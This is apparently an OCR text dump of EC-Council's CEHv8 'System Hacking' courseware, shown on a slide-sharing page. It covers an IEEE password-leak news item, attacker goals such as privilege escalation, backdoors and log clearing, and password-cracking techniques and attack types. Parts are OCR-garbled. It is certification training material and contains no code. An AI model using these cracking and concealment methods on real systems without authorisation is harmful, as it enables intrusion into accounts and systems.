IRJET- Image Steganography using Pixel Pattern Matching in Cloud Data Sto...
IRJET- Image Steganography using Pixel Pattern Matching in Cloud Data Sto...IRJET- Image Steganography using Pixel Pattern Matching in Cloud Data Sto...
IRJET- Image Steganography using Pixel Pattern Matching in Cloud Data Sto...
 
DSS ITSEC 2012 Conference - Presentation CEHv7
DSS ITSEC 2012 Conference - Presentation CEHv7DSS ITSEC 2012 Conference - Presentation CEHv7
DSS ITSEC 2012 Conference - Presentation CEHv7
 
An efficient lightweight key exchange algorithm for internet of things appli...
An efficient lightweight key exchange algorithm for internet of things appli...An efficient lightweight key exchange algorithm for internet of things appli...
An efficient lightweight key exchange algorithm for internet of things appli...
 
network security ppt.pptx
network security ppt.pptxnetwork security ppt.pptx
network security ppt.pptx
 
WLAN Penetration Examination of The University of Pembangunan Panca Budi
WLAN Penetration Examination of The University of Pembangunan Panca BudiWLAN Penetration Examination of The University of Pembangunan Panca Budi
WLAN Penetration Examination of The University of Pembangunan Panca Budi
 
J0704055058
J0704055058J0704055058
J0704055058
 
Network security
Network securityNetwork security
Network security
 
IRJET- Privacy Preserving and Proficient Identity Search Techniques for C...
IRJET- Privacy Preserving and Proficient Identity Search Techniques for C...IRJET- Privacy Preserving and Proficient Identity Search Techniques for C...
IRJET- Privacy Preserving and Proficient Identity Search Techniques for C...
 

Kürzlich hochgeladen

EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWERMadyBayot
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...apidays
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamUiPathCommunity
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxRustici Software
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusZilliz
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Bhuvaneswari Subramani
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfOrbitshub
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxRemote DBA Services
 

Kürzlich hochgeladen (20)

EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 

Ce hv8 module 05 system hacking

  • 2. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker System H acking Module 05 Engineered by Hackers. Presented by Professionals. i. / CEH P n! Ethical Hacking and Countermeasures v8 Module: 05 System Hacking Exam 312-50 Module 05 Page 518 Ethical Hacking and Countermeasures Copyright © by EC-C0linCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 3. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Security News CEH (•itifwtf m - itkMl lUclwt September 26th, 2012 IE E E H a ck C o n firm ed , 100k Plain T e x t P assw o rd s V ulnerable After details were revealed by Radu Dragusin over at IEEEIog.com a few days ago that passwords and user details for some 100,000 members of the Institute of Electrical and Electronics Engineers had been made publicly available on the company's FTP server for at least a month, the organisation has now confirmed it in a communication to members, advising them to change their details immediately. The IEEE is an organisation that is designed to advance technology and has over 400,000 members worldwide, many of those including employees at Apple, Google, IBM, Oracle and Samsung. It is responsible for globally used standards like the IEEE 802.3 Ethernet standard and the IEEE 802.11 Wireless Networking standard. At an organisation like this, you'd expect security to be high. Still, this hack was no hoax. The official announcement of it was sent out yesterday and reads: "IEEE has become aware of an incident regarding inadvertent access to unencrypted log files containing user IDs and passwords. This matter has been addressed and resolved. None of your financial information was made accessible in this situation." http://www.kitguru.net Copyright © by EC-Caind. All Rights Reserved. Reproduction is Strictly Prohibited. Security N ew s IE E E Hack Confirm ed, 100k Plain Text Passwords Vulnerable Source: http://www.kitguru.net After details were revealed by Radu Dragusin over at IEEEIog.com recently that passwords and user details for some 100,000 members of the Institute of Electrical and Electronics Engineers had been made publicly available on the company's FTP server for at least a month, the organization confirmed this in a communication to members, advising them to change their details immediately. The IEEE is an organization that is designed to advance technology and has over 400,000 members worldwide, many of those including employees at Apple, Google, IBM, Oracle, and Samsung. It is responsible for globally used standards like the IEEE 802.3 Ethernet standard and the IEEE 802.11 Wireless Networking standard. At an organization like this, you'd expect security to be high. Still, this hack was no hoax. The official announcement of it reads: "IEEE has become aware of an incident regarding inadvertent access to unencrypted log files containing user IDs and Module 05 Page 519 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 4. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker passwords. This matter has been addressed and resolved. None of your financial information was made accessible in this situation." The company continued saying though, that it was technically possible that during the time this information was available, that someone could have used it to access a user's account and therefore, as a "precautionary measure," the IEEE recommended all users change their account information. Until that time, users were not be able to access their account at all. In what seems like quite a bold move, the organization went on to explain to users that one of the best ways to protect themselves is to use a strong, unique password for their login. Considering it was an IEEE security blunder that caused the hack, advising other people on password strength seems a bit hypocritical. That said, in Mr Dragusin's reveal of the hacked information, he produced a graph detailing some of the most commonly used passwords. Almost 300 people used "123456" and other variations of numbers in that same configuration, while hundreds of others used passwords like "admin," "student," and "ieee2012." Considering the involvement of IEEE members in pushing the boundaries of current technology, you'd assume we wouldn't need to turn to Eugene "The Plague" Belford to explain the importance of password security. Copyright © 2010-2013 KitGuru Lim ited Author: Jon Martindale http://www.kitguru.net/channel/ion-rnartindale/ieee-hack-confirmed-100k-plain-textpasswords-vulnerable/ Module 05 Page 520 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 5. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker M odule O bjectives ‫י‬ CEH UrtilM itkKJl Nm Im ‫י‬ r J System Hacking: Goals J Types of Keystroke Loggers and Spywares J CEH Hacking Methodology (CHM) J Anti-Keylogger and Anti-Spywares J Password Cracking J Detecting Rootkits J Stealing Passwords Using Keyloggers J Anti-Rootkits J Microsoft Authentication J NTFS Stream Manipulation J How to Disable LM HASH J Classification of Steganography J How to Defend against Password Cracking J Steganalysis Methods/Attacks on Steganography J Privilege Escalation J Covering Tracks J Executing Applications J Penetration Testing ^ Copyright © by EC-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. M odule O bjectives The preceding modules dealt with the progressive intrusion that an attacker makes towards his or her target system(s). You should bear in mind that this does not indicate a culmination of the attack. This module familiarizes you with: System Hacking: Goals Types of Keystroke Loggers and Spywares CEH Hacking Methodology (CHM) Anti-Keylogger and Anti-Spywares Password Cracking Detecting Rootkits Stealing Passwords Using Keyloggers Anti-Rootkits Microsoft Authentication NTFS Stream Manipulation Howto Disable LM HASH Classification of Steganography How to Defend against Password Cracking Steganalysis Methods/Attacks on Steganography Privilege Escalation Covering Tracks Executing Applications Penetration Testing Module 05 Page 521 Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 6. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Inform ation at Hand Before System H acking Stage C EH (•rtifwtf itkitjl What you have at this stage: Copyright © by EG-Cowid. All Rights Reserved Reproduction is Strictly Prohibited. Inform ation at Hand Before System H acking Stage Before beginning with system hacking, let's go over the phases you went through and the information you collected so far. Prior to this module, we discussed: Footprinting M odule Footprinting is the process of accumulating data regarding a specific network environment. Usually this technique is applied for the purpose of finding ways to intrude into the network environment. Since footprinting can be used to attack a system, it can also be used to protect it. In the footprinting phase, the attacker creates a profile of the target organization, with the information such as its IP address range, namespace, and employee web usage. Footprinting improves the ease with which the systems can be exploited by revealing system vulnerabilities. Determining the objective and location of an intrusion is the primary step involved in footprinting. Once the objective and location of an intrusion is known, by using nonintrusive methods, specific information about the organization can be gathered. For example, the web page of the organization itself may provide employee bios or a personnel directory, which the hacker can use it for the social engineering to reach the objective. Conducting a Whois query on the web provides the associated networks and domain names related to a specific organization. Module 05 Page 522 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 7. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Scanning M odule Scanning is a procedure for identifying active hosts on a network, either for the purpose of network security assessment or for attacking them. In the scanning phase, the attacker finds information about the target assessment through its IP addresses that can be accessed over the Internet. Scanning is mainly concerned with the identification of systems on a network and the identification of services running on each computer. Some of the scanning procedures such as port scans and ping sweeps return information about the services offered by the live hosts that are active on the Internet and their IP addresses. The inverse mapping scanning procedure returns the information about the IP addresses that do not map to the live hosts; this allows an attacker to make suppositions about feasible addresses. Enum eration M odule Enumeration is the method of intrusive probing into the target assessment through which attackers gather information such as network user lists, routing tables, and Simple Network Management Protocol (SNMP) data. This is significant because the attacker crosses over the target territory to unearth information about the network, and shares users, groups, applications, and banners. The attacker's objective is to identify valid user accounts or groups where he or she can remain inconspicuous once the system has been compromised. Enumeration involves making active connections to the target system or subjecting it to direct queries. Normally, an alert and secure system will log such attempts. Often the information gathered is what the target might have made public, such as a DNS address; however, it is possible that the attacker stumbles upon a remote IPC share, such as IPC$ in Windows, that can be probed with a null session allowing shares and accounts to be enumerated Module 05 Page 523 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 8. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker System Hacking: Goals C EH («>«1fw4 itkMjl IlMhM r ‫־‬ N Hacking-Stage Goal Technique/Exploit Used Gaining Access To collect enough information to gain access Password eavesdropping, brute forcing Escalating Privileges T create a privileged user account o if the user level is obtained Password cracking, known exploits |» | A np 15■ h ■ ‫1 יי ׳ #יו*»י‬ To create and maintain backdoor access Hiding Files ‫■יין‬ Trojans To hide malicious files Rootkits To hide the presence of compromise Clearing logs Copyright © by E&Cauactl. All Rights Reserved. Reproduction isStrictly Prohibited. System Hacking: Goals Every criminal commits a crime to achieve certain goal. Likewise, an attacker can also have certain goals behind performing attacks on a system. The following may be some of the goals of attackers in committing attacks on a system. The table shows the goal of an attacker at different hacking stages and the technique used to achieve that goal. Module 05 Page 524 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 9. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker r Hacking-Stage Technique/Exploit Used Gaining Access To collect enough information to gain access Password eavesdropping, brute forcing Escalating Privileges To create a privileged user account if the user level is obtained Password cracking, known exploits Executing Applications To create and maintain backdoor access Trojans Hiding Files To hide malicious files Rootkits Covering Tracks s Goal To hide the presence of compromise Clearing logs A ao FIGURE 5.1: Goals for System Hacking Module 05 Page 525 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 10. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker CEH Hacking Me Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. CEH H acking M ethodology (CHM) N —(£__4) ^ ‫ ^׳־־־‬Before hacking a system, an attacker uses footprinting, scanning, and enumeration techniques to detect the target area of the attack and the vulnerabilities that prove to be doorways for the attacker. Once the attacker gains all the necessary information, he or she starts hacking. Similar to the attacker, an ethical hacker also follows the same steps to test a system or network. In order to ensure the effectiveness of the test, the ethical hacker follows the hacking methodology. The following diagram depicts the hacking methodology followed by ethical hackers: Module 05 Page 526 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 11. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker FIGURE 5.2: CEH Hacking Methodology (CHM) Module 05 Page 527 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 12. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker CEH System H acking Steps *‫־‬ System hacking cannot be accomplished at a single go. It is accomplished through various steps that include cracking passwords, escalating privileges, executing applications, hiding files, covering tracks, and finally penetration testing. Now it's time to discuss these steps one by one thoroughly, to determine how the attacker hacks the system. In an attempt to hack a system, the attacker first tries to crack passwords. This section describes the first step, i.e., password cracking, that will tell you how and what types of different tools and techniques an attacker uses to crack the password of the target system. 121 IE.- Cracking Passwords Hiding Files ^ Escalating Privileges Covering Tracks Executing Applications Penetration Testing Module 05 Page 528 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 13. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Passw ord C racking CEH (•It'fwd ttkujl M ck * a • Password cracking techniques are used to recover passwords from computer systems Attackers use password cracking techniques to gain unauthorized access to the vulnerable system Victim Attacker Most of the password cracking techniques are successful due to weak or easily guessable passwords Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. Password Cracking —“ Password cracking is the process of recovering passwords from the data that has been transmitted by a computer system or stored in it. The purpose of password cracking might be to help a user recover a forgotten or lost password, as a preventive measure by the system administrators to check for easily crackable passwords or it can also be used to gain unauthorized access to a system. Many hacking attempts start with password cracking attempts. Passwords are the key piece of information necessary to access a system. Consequently, most attackers use password cracking techniques to gain unauthorized access to the vulnerable system. Passwords may be cracked manually or with automated tools such as a dictionary or brute-force method. The computer programs that are designed for cracking passwords are the functions of the number of possible passwords per second that can be checked. Often users, while creating passwords, select passwords that are predisposed to being cracked such as using a pet's name or choosing one that's simple so they can remember it. Most of the passwords cracking techniques are successful due to weak or easily guessable passwords. Module 05 Page 529 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 14. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Passw ord C om plexity CEH © Passwords that contain only letters P O TH M YD E ......... V © Passwords that contain only letters and special ..............v characters bob@&ba ^ Passwords that contain only special characters .......... I and numbers 123@$45 * 0 A+D+u = Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. Password C om plexity Password complexity plays a key role in improving security against attacks. It is the important element that users should ensure while creating a password. The password should not be simple since simple passwords are prone to attacks. The passwords that you choose should always be complex, long, and difficult to remember. The password that you are setting for your account must meet the complexity requirements policy setting. Password characters should be a combination of alphanumeric characters. Alphanumeric characters consist of letters, numbers, punctuation marks, and mathematical and other conventional symbols. See the implementation that follows for the exact characters referred to: 0 Passwords that contain letters, special characters, and numbers: apl@52 0 Passwords that contain only numbers: 23698217 0 Passwords that contain only special characters: & *# @ !(%) 0 Passwords that contain letters and numbers: meetl23 0 Passwords that contain only letters: POTHMYDE 0 Passwords that contain only letters and special characters: bob@&ba 0 Passwords that contain only special characters and numbers: 123@$4 Module 05 Page 530 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 15. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Password Cracking T echniques CEH UrtifW A dictionary file The program tries is loaded into the cracking every combination of application that characters until runs against user accounts the password is broken ■ Dictionary Attack It works like a dictionary attack, but adds some numbers and symbols to the words from the dictionary and tries to crack the password itkH il lUckw It is the This attack is used combination of both brute force when the attacker gets some attack and the information about dictionary attack the password ■ ■ B ru te Forcing H y b rid Syllable R u le -ba sed A ttacks A tta ck A tta ck A tta ck 0 * j Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. Password Cracking T echniques Password cracking is the technique used for discovering passwords. It is the classic way to gain privileges to a computer system or network. The common approach for cracking a password is to continually try guesses for the password with various combinations until you get the correct one. There are five techniques for password cracking, as follows. D ictionary Attacks In a dictionary attack, a dictionary file is loaded into the cracking application that runs against user accounts. This dictionary is the text file that contains a number of dictionary words. The program uses every word present in the dictionary to find the password. Dictionary attacks are more useful than brute force attacks. But this attack does not work with a system that uses passphrases. This attack can be applied under two situations: Q In cryptanalysis, it is used to find out the decryption key for obtaining plaintext from ciphertext. © In computer security, to avoid authentication and access the computer by guessing passwords. Module 05 Page 531 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 16. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Methods to improve the success of a dictionary attack: 0 Use the number of dictionaries such as Technical dictionaries and foreign dictionaries which helps to retrieve the correct password © Use the string manipulation on the dictionary, means if dictionary contain the word "system" then try string manipulation and use "metsys" and others Brute Forcing Attacks The cryptographic algorithms must be sufficiently hardened in order to prevent a brute-force attack. The definition as stated by RSA: "Exhaustive key-search, or brute-force search, is the basic technique for trying every possible key in turn until the correct key is identified." When someone tries to produce each and every single encryption key for data until the needed information is detected, this is termed a brute force attack. Until this date, this type of attack was performed by those who had sufficient processing power. The United States government once believed (in 1977) that a 56-bit Data Encryption Standard (DES) was sufficient to deter all brute-force attacks, a claim that several groups across the world had tested. Cryptanalysis is a brute force attack on an encryption of a brute force search of the keyspace. In other words, testing all possible keys is done in an attempt to recover the plaintext used to produce a particular ciphertext. The detection of key or plaintext with a faster pace as compared to the brute force attack can be considered a way of breaking the cipher. A cipher is secure if no method exists to break that cipher other than the brute force attack. Mostly, all ciphers are deficient of mathematical proof of security. If the keys are originally chosen randomly or searched randomly, the plaintext will, on average, become available after half of all the possible keys are tried. Some of the considerations for brute-force attacks are as follows: © It is a time-consuming process © All passwords will eventually be found © Attacks against NT hashes are much more difficult than LM hashes Q P Hybrid Attack ‫ ׳ ־יי‬This type of attack depends upon the dictionary attack. There are chances that people — might change their password by just adding some numbers to their old password. In this type of attack, the program adds some numbers and symbols to the words from the dictionary and tries to crack the password. For example, if the old password is "system," then there is a chance that the person will change it to "systeml" or "system2." Module 05 Page 532 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 17. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker S yllable A ttack A s y lla b le a t t a c k is t h e c o m b i n a t i o n o f b o t h a b r u t e f o r c e a t t a c k a n d t h e d ic t io n a r y a tta c k . This c r a c k in g t e c h n i q u e is used w h e n t h e p a s s w o r d is n o t an e x is t in g w o r d . A t t a c k e r s use t h e d i c t i o n a r y a n d o t h e r m e t h o d s t o c ra c k it. It also uses t h e p o s s ib le c o m b i n a t i o n o f e v e r y w o r d p r e s e n t in t h e d ic t io n a r y . R u le-b ase d A ttack T his t y p e o f a t t a c k is used w h e n t h e a t t a c k e r g e ts s o m e i n f o r m a t i o n a b o u t th e p a s s w o r d . T his is t h e m o s t p o w e r f u l a t t a c k b e c a u s e t h e c r a c k e r k n o w s t h e t y p e o f p a s s w o r d . For e x a m p le , if t h e a t t a c k e r k n o w s t h a t t h e p a s s w o r d c o n t a in s a t w o - o r t h r e e - d i g i t n u m b e r , t h e n h e o r she w i ll use s o m e s p e c ific t e c h n i q u e s a n d e x t r a c t t h e p a s s w o r d in less t i m e . By o b t a i n i n g u s e fu l i n f o r m a t i o n such as use o f n u m b e r s , t h e le n g t h o f p a s s w o r d , a n d sp ec ial c h a r a c te r s , t h e a t t a c k e r can e a sily a d ju s t t h e t i m e f o r r e t r i e v i n g t h e p a s s w o r d t o t h e m i n i m u m a n d e n h a n c e t h e c r a c k in g t o o l t o r e t r i e v e p a s s w o r d s . T h is t e c h n i q u e in v o lv e s b r u t e fo r c e , d ic t io n a r y , a n d s y l l a b le a tta c k s . Module 05 Page 533 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 18. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Types of Password Attacks Shoulder Surfing » e Social Engineering e Dumpster Diving 1. Passive Online Attacks C EH » Wire Sniffing tJ Man-in-the-Middle e Attacker performs password hacking without communicating with the authorizing party Replay 2. Active Online Attacks 4. Non-Electronic Attacks Attacker need not posses Attacker tries a list of technical knowledge to crack passwords one by one against the victim to crack password password, hence known as non-technical attack 6 Distributed Network « Rainbow 4 A 3. Offline Attack a Hash Injection Attacker copies the target's password file and then tries to crack passwords in his own system at different location « Trojan/Spyware/Keyloggers « Password Guessing w Phishing Pre-Computed Hashes » $ Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. it ‫וך‬ T ypes of P assw o rd A ttacks P a s s w o rd c r a c k in g is o n e o f t h e c ru c ia l sta ge s o f h a c k i n g a s y s t e m . P a s s w o rd c r a c k in g u sed f o r le g a l p u r p o s e s r e c o v e r s t h e f o r g o t t e n p a s s w o r d o f a u se r; if it is u sed b y i l l e g i t i m a t e users, it can ca use t h e m t o g a in u n a u t h o r i z e d p r i v i le g e t o t h e n e t w o r k o r s y s te m . P a s s w o rd a tta c k s a re c la s s ifie d b ase d o n t h e a t t a c k e r 's a c tio n s t o c ra c k a p a s s w o r d . U s u a lly t h e r e a re o f f o u r ty p e s . T h e y are: A 111A P a ssiv e O n lin e A ttacks A passive a t t a c k is an a t t a c k o n a s y s te m t h a t d o e s n o t r e s u lt in a c h a n g e t o t h e s y s te m in a n y w a y . T h e a t t a c k is t o p u r e l y m o n i t o r o r r e c o r d d a ta . A p a s s iv e a t t a c k o n a c r y p t o s y s t e m is o n e in w h i c h t h e c r y p t a n a l y s t c a n n o t i n t e r a c t w i t h a n y o f t h e p a r tie s in v o lv e d , a t t e m p t i n g t o b r e a k t h e s y s te m s o le ly b a se d u p o n o b s e r v e d d a ta . T h e r e a re t h r e e ty p e s o f p assive o n l i n e a tta c k s . T h e y are: Q W i r e s n if fin g Q M a n -in -th e -m id d le Q R ep lay Module 05 Page 534 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
